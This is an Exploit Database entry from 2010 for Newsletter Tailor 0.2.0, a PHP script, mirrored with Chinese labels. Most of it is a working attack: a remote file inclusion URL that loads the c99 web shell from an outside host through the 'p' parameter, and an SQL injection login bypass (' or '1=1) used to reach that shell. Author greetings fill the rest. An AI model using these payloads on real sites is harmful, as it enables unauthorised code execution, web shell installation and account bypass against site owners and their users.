NewsLetter Tailor 0.2.0 – Remote File Inclusion

• Exploit Database
• 9 阅读

• 作者： snakespc
  日期： 2010-02-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11378/

• ==============================================================================
  [»] Newsletter Tailor Remote File Include Vulnerability
  ==============================================================================
   
  [»] Script: [ Newsletter Tailor ]
  [»] Language: [ PHP ]
  [»] Download: [ http://sourceforge.net/projects/nlettertailor/ ]
  [»] Founder:[ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]
  [»] Greetz to:[ SnakesTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]
  [»] Note: [ Thank you ViRuSMaN on script]
   
  ###########################################################################
   ===[ Exploit ]=== include($p.".php");
   
  [»] http://server/list/admin/index.php?p=http://localhost/c99.txt?
  [»]Note: When you update the page prompts you to log on
  [»](Auth Bypass) SQL Injection :user:' or '1=1pass:' or '1=1
  Then be accessed on the "sh3ll"
  Author: Snakespc <- 
  ###########################################################################